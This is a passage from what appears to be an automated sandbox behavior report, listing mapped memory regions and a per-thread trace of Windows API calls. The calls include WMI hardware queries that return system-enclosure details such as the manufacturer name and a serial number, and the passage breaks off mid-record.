monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1257 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1258 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1259 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1260 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1261 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1262 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1263 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1264 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1265 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1266 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1267 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1283 start_va = 0x7fefac40000 end_va = 0x7fefac6bfff monitored = 0 entry_point = 0x7fefac58194 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 1284 start_va = 0x74d90000 end_va = 0x74d92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 1285 start_va = 0xa50000 end_va = 0xa51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1286 start_va = 0x7fefb550000 end_va = 0x7fefb560fff monitored = 0 entry_point = 0x7fefb551070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1287 start_va = 0x7fefd170000 end_va = 0x7fefd1acfff monitored = 0 entry_point = 0x7fefd1718f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1288 start_va = 0xa60000 end_va = 0xa60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1289 start_va = 0xb10000 end_va = 0xb16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1290 start_va = 0xa60000 end_va = 0xa60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1291 start_va = 0xb10000 end_va = 0xb16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1292 start_va = 0x7fefb170000 end_va = 0x7fefb19bfff monitored = 0 entry_point = 0x7fefb1715c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1293 start_va = 0x7fefb420000 end_va = 0x7fefb435fff monitored = 0 entry_point = 0x7fefb4211a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1294 start_va = 0x7fefb410000 end_va = 0x7fefb41bfff monitored = 0 entry_point = 0x7fefb4118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1295 start_va = 0x7fefcfc0000 end_va = 0x7fefcfe2fff monitored = 0 entry_point = 0x7fefcfc1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1296 start_va = 0x7fefb3d0000 end_va = 0x7fefb3e3fff monitored = 0 entry_point = 0x7fefb3d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1297 start_va = 0x7fefc8b0000 end_va = 0x7fefc8dffff monitored = 0 entry_point = 0x7fefc8b194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1298 start_va = 0x7fef6fa0000 end_va = 0x7fef6fb1fff monitored = 0 entry_point = 0x7fef6faaab8 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1299 start_va = 0x7fefac30000 end_va = 0x7fefac39fff monitored = 0 entry_point = 0x7fefac331c8 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1300 start_va = 0x7fefad80000 end_va = 0x7fefad8bfff monitored = 0 entry_point = 0x7fefad815d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1301 start_va = 0xa60000 end_va = 0xa62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 1396 start_va = 0x1180000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1406 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Thread: id = 62 os_tid = 0xc90 Thread: id = 63 os_tid = 0xc8c [0058.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309c3be0, dwHighDateTime=0x1d92f76)) [0058.076] free (_Block=0x2bef20) [0058.076] FreeLibrary (hLibModule=0x72450000) returned 1 [0058.077] free (_Block=0x2bd1d0) [0058.077] free (_Block=0x2bd220) [0058.077] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.077] free (_Block=0x2bef80) [0058.077] FreeLibrary (hLibModule=0x77280000) returned 1 [0058.077] free (_Block=0x2c2310) [0058.077] free (_Block=0x2bd270) [0058.077] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.078] free (_Block=0x2befc0) [0058.078] FreeLibrary (hLibModule=0x77160000) returned 1 [0058.078] free (_Block=0x2c1c00) [0058.078] free (_Block=0x2bd2c0) [0058.078] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.078] free (_Block=0x2bef60) [0058.078] FreeLibrary (hLibModule=0x7fefb420000) returned 1 [0058.082] free (_Block=0x2c1a80) [0058.082] free (_Block=0x2bd310) [0058.082] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.082] free (_Block=0x2beee0) [0058.082] FreeLibrary (hLibModule=0x7fefd540000) returned 1 [0058.082] free (_Block=0x2c1400) [0058.083] free (_Block=0x2bd360) [0058.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x309e9d40, dwHighDateTime=0x1d92f76)) [0058.083] WaitForSingleObjectEx (hHandle=0x1fc, dwMilliseconds=0x493d1, bAlertable=0) returned 0x0 [0058.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30af46e0, dwHighDateTime=0x1d92f76)) [0058.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30af46e0, dwHighDateTime=0x1d92f76)) [0058.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30af46e0, dwHighDateTime=0x1d92f76)) [0058.188] WaitForSingleObjectEx (hHandle=0x1fc, dwMilliseconds=0x26a2, bAlertable=0) returned 0x0 [0058.239] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30b66b00, dwHighDateTime=0x1d92f76)) [0058.239] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30b66b00, dwHighDateTime=0x1d92f76)) [0058.239] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x30b66b00, dwHighDateTime=0x1d92f76)) [0058.239] WaitForSingleObjectEx (hHandle=0x1fc, dwMilliseconds=0x2674, bAlertable=0) returned 0x102 [0068.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3696d000, dwHighDateTime=0x1d92f76)) [0068.095] free (_Block=0x2bf120) [0068.095] FreeLibrary (hLibModule=0x74d90000) returned 1 [0068.098] free (_Block=0x2c1d80) [0068.099] free (_Block=0x2bd860) [0068.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3696d000, dwHighDateTime=0x1d92f76)) [0068.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3696d000, dwHighDateTime=0x1d92f76)) [0068.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3696d000, dwHighDateTime=0x1d92f76)) [0068.099] WaitForSingleObjectEx (hHandle=0x1fc, dwMilliseconds=0x5d, bAlertable=0) returned 0x102 [0078.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3c8f02c0, dwHighDateTime=0x1d92f76)) [0078.110] free (_Block=0x2befc0) [0078.110] FreeLibrary (hLibModule=0x77160000) returned 1 [0078.111] free (_Block=0x2c13b0) [0078.113] free (_Block=0x2bd310) [0078.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x104f7d8 | out: lpSystemTimeAsFileTime=0x104f7d8*(dwLowDateTime=0x3c8f02c0, dwHighDateTime=0x1d92f76)) [0078.113] free (_Block=0x2beee0) [0078.113] FreeLibrary (hLibModule=0x7fefb420000) returned 1 [0078.129] free (_Block=0x2c1a80) [0078.130] free (_Block=0x2bd270) [0078.130] WaitForSingleObjectEx (hHandle=0x1fc, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 64 os_tid = 0xc88 [0096.849] DllCanUnloadNow () returned 0x1 [0216.877] DllCanUnloadNow () returned 0x1 Thread: id = 65 os_tid = 0xc84 Thread: id = 66 os_tid = 0xc80 [0057.952] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0057.979] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0057.980] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0057.987] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0057.987] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0xcf530 [0057.987] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da50 | out: hHeap=0x60000) returned 1 [0057.987] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x2c) returned 0xebea0 [0057.987] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xcf530 | out: hHeap=0x60000) returned 1 [0057.988] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0xc8) returned 0x96760 [0057.989] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x96760 | out: hHeap=0x60000) returned 1 [0057.989] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x38) returned 0x12d0e0 [0057.989] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x12d0e0 | out: hHeap=0x60000) returned 1 [0057.989] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x84) returned 0xb3d60 [0057.990] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xebea0 | out: hHeap=0x60000) returned 1 [0057.992] memcpy (in: _Dst=0xdfe038, _Src=0xcfeac, _Size=0x4 | out: _Dst=0xdfe038) returned 0xdfe038 [0057.992] memcpy (in: _Dst=0xdfe038, _Src=0xcf7b9, _Size=0x4 | out: _Dst=0xdfe038) returned 0xdfe038 [0057.992] memcpy (in: _Dst=0xdfe038, _Src=0xcfeb4, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0057.992] memcpy (in: _Dst=0xdfe038, _Src=0xcf7bf, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0057.993] memcpy (in: _Dst=0xdfe038, _Src=0xcf7c1, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.000] memcpy (in: _Dst=0xdfe038, _Src=0xd2fa9, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.000] memcpy (in: _Dst=0xdfe038, _Src=0xd2fab, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.000] memcpy (in: _Dst=0xdfe038, _Src=0xd2fad, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.001] memcpy (in: _Dst=0xdfe038, _Src=0xd2faf, _Size=0x2 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.001] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0x121470 [0058.001] SafeArrayGetElemsize (psa=0x12d330) returned 0x8 [0058.001] memcpy (in: _Dst=0xdfde20, _Src=0xdfdd48, _Size=0x8 | out: _Dst=0xdfde20) returned 0xdfde20 [0058.002] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x121470 | out: hHeap=0x60000) returned 1 [0058.002] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9bc70 | out: hHeap=0x60000) returned 1 [0058.002] memcpy (in: _Dst=0xdfe038, _Src=0xf25fe, _Size=0x4 | out: _Dst=0xdfe038) returned 0xdfe038 [0058.019] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fef98060b0, UserDataCount=0x5, UserData=0xdfdfb0) returned 0x0 [0058.020] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () [0058.025] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0058.030] SetLastError (dwErrCode=0x0) [0058.030] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.030] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da70 [0058.030] SetLastError (dwErrCode=0x0) [0058.030] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.030] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0058.030] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 [0058.030] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0xcf470 [0058.030] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0xcf470, pulNumLanguages=0xdfe248 | out: pulNumLanguages=0xdfe248) returned 1 [0058.030] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xcf470 | out: hHeap=0x60000) returned 1 [0058.052] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x4) returned 0x9da70 [0058.052] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9da70, pulNumLanguages=0xdfe240 | out: pulNumLanguages=0xdfe240) returned 1 [0058.052] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 [0058.060] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0058.065] SetLastError (dwErrCode=0x0) [0058.065] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.065] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0058.065] SetLastError (dwErrCode=0x0) [0058.065] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da50, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da50, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.066] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da70 [0058.066] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da50 | out: hHeap=0x60000) returned 1 [0058.066] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0xcf470 [0058.066] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0xcf470, pulNumLanguages=0xdfe248 | out: pulNumLanguages=0xdfe248) returned 1 [0058.066] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xcf470 | out: hHeap=0x60000) returned 1 [0058.067] malloc (_Size=0xa8) returned 0x2c1d80 [0058.068] LoadLibraryW (lpLibFileName="WMI.DLL") returned 0x74d90000 [0058.071] GetProcAddress (hModule=0x74d90000, lpProcName="WmiQueryAllDataW") returned 0x7feff078440 [0058.071] GetProcAddress (hModule=0x74d90000, lpProcName="WmiQuerySingleInstanceW") returned 0x7feff085600 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiSetSingleItemW") returned 0x7feff0bb080 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiSetSingleInstanceW") returned 0x7feff0bb350 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiExecuteMethodW") returned 0x7feff0babd0 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiNotificationRegistrationW") returned 0x7feff06a760 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiMofEnumerateResourcesW") returned 0x7feff069660 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiFileHandleToInstanceNameW") returned 0x7feff0ba760 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiDevInstToInstanceNameW") returned 0x7feff0857e0 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiQueryGuidInformation") returned 0x7feff069a70 [0058.072] GetProcAddress (hModule=0x74d90000, lpProcName="WmiOpenBlock") returned 0x7feff078380 [0058.073] GetProcAddress (hModule=0x74d90000, lpProcName="WmiCloseBlock") returned 0x7feff078650 [0058.073] GetProcAddress (hModule=0x74d90000, lpProcName="WmiFreeBuffer") returned 0x7feff069b10 [0058.073] GetProcAddress (hModule=0x74d90000, lpProcName="WmiEnumerateGuids") returned 0x7feff0ba580 [0058.073] malloc (_Size=0x18) returned 0x2bf120 [0058.073] WmiOpenBlock () returned 0x0 [0058.074] malloc (_Size=0x1000) returned 0x2c53d0 [0058.074] WmiQueryAllDataW () returned 0x0 [0058.075] WmiCloseBlock () returned 0x0 [0058.075] malloc (_Size=0x48) returned 0x2bd860 [0058.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfd8e8 | out: lpSystemTimeAsFileTime=0xdfd8e8*(dwLowDateTime=0x309c3be0, dwHighDateTime=0x1d92f76)) [0058.075] malloc (_Size=0x10) returned 0x2bf140 [0058.075] SetEvent (hEvent=0x1fc) returned 1 [0058.075] malloc (_Size=0x9a0) returned 0x2c63e0 [0058.075] malloc (_Size=0x420) returned 0x2c1e30 [0058.087] LoadStringW (in: hInstance=0x7fef1ca0000, uID=0x3f, lpBuffer=0xdfd810, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0058.087] lstrlenW (lpString="Inventec") returned 8 [0058.088] SafeArrayPutElement (psa=0x12daf0, rgIndices=0xdfda84, pv=0xdfda80) returned 0x0 [0058.088] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x78) returned 0x9a570 [0058.088] SafeArrayGetDim (psa=0x12daf0) returned 0x1 [0058.088] SafeArrayGetLBound (in: psa=0x12daf0, nDim=0x1, plLbound=0xdfd844 | out: plLbound=0xdfd844) returned 0x0 [0058.088] SafeArrayGetUBound (in: psa=0x12daf0, nDim=0x1, plUbound=0xdfd850 | out: plUbound=0xdfd850) returned 0x0 [0058.088] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xf4350 [0058.088] SafeArrayGetDim (psa=0x12daf0) returned 0x1 [0058.088] SafeArrayGetUBound (in: psa=0x12daf0, nDim=0x1, plUbound=0xdfd808 | out: plUbound=0xdfd808) returned 0x0 [0058.088] SafeArrayGetElemsize (psa=0x12daf0) returned 0x2 [0058.088] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xf4290 [0058.088] SafeArrayGetElemsize (psa=0x12dbb0) returned 0x2 [0058.088] SafeArrayGetElement (in: psa=0x12daf0, rgIndices=0xdfd6e0, pv=0xdfd710 | out: pv=0xdfd710) returned 0x0 [0058.088] SafeArrayPutElement (psa=0x12dbb0, rgIndices=0xf4290, pv=0xdfd718) returned 0x0 [0058.088] SafeArrayRedim (in: psa=0x12dbb0, psaboundNew=0xf42a8 | out: psa=0x12dbb0) returned 0x0 [0058.089] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xf4290 | out: hHeap=0x60000) returned 1 [0058.089] SafeArrayGetLBound (in: psa=0x12dbb0, nDim=0x1, plLbound=0xdfd774 | out: plLbound=0xdfd774) returned 0x0 [0058.089] SafeArrayGetUBound (in: psa=0x12dbb0, nDim=0x1, plUbound=0xdfd770 | out: plUbound=0xdfd770) returned 0x0 [0058.089] SafeArrayGetElement (in: psa=0x12dbb0, rgIndices=0xdfd818, pv=0xdfd7a8 | out: pv=0xdfd7a8) returned 0x0 [0058.090] SafeArrayPutElement (psa=0x12dcb0, rgIndices=0xdfd818, pv=0xdfd7a8) returned 0x0 [0058.090] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xf4350 | out: hHeap=0x60000) returned 1 [0058.090] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9a570 | out: hHeap=0x60000) returned 1 [0058.090] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x78) returned 0x9a570 [0058.090] SafeArrayGetDim (psa=0x12dcb0) returned 0x1 [0058.090] SafeArrayGetLBound (in: psa=0x12dcb0, nDim=0x1, plLbound=0xdfd6a4 | out: plLbound=0xdfd6a4) returned 0x0 [0058.090] SafeArrayGetUBound (in: psa=0x12dcb0, nDim=0x1, plUbound=0xdfd6b0 | out: plUbound=0xdfd6b0) returned 0x0 [0058.090] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xf4350 [0058.090] SafeArrayGetDim (psa=0x12dcb0) returned 0x1 [0058.090] SafeArrayGetUBound (in: psa=0x12dcb0, nDim=0x1, plUbound=0xdfd668 | out: plUbound=0xdfd668) returned 0x0 [0058.091] SafeArrayGetElemsize (psa=0x12dcb0) returned 0x4 [0058.091] SafeArrayGetElement (in: psa=0x12dcb0, rgIndices=0xdfd7a0, pv=0xdfd7d0 | out: pv=0xdfd7d0) returned 0x0 [0058.091] SafeArrayGetElement (in: psa=0x12dcb0, rgIndices=0xdfd7a0, pv=0xdfd7d0 | out: pv=0xdfd7d0) returned 0x0 [0058.091] memcpy (in: _Dst=0xdfd798, _Src=0x9da90, _Size=0x4 | out: _Dst=0xdfd798) returned 0xdfd798 [0058.092] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xf4350 | out: hHeap=0x60000) returned 1 [0058.092] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9a570 | out: hHeap=0x60000) returned 1 [0058.092] lstrlenW (lpString="PVT") returned 3 [0058.092] lstrlenW (lpString="JP7XY4J") returned 7 [0058.093] lstrlenW (lpString="To Be Filled By O.E.M.") returned 22 [0058.106] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x4) returned 0x9da50 [0058.106] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9da50, pulNumLanguages=0xdfe240 | out: pulNumLanguages=0xdfe240) returned 1 [0058.106] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da50 | out: hHeap=0x60000) returned 1 [0058.114] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0058.119] SetLastError (dwErrCode=0x0) [0058.119] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.119] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da70 [0058.119] SetLastError (dwErrCode=0x0) [0058.119] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.119] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0058.119] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 [0058.119] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0x9d490 [0058.119] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9d490, pulNumLanguages=0xdfe248 | out: pulNumLanguages=0xdfe248) returned 1 [0058.119] HeapFree (in: hHeap=0x60000, 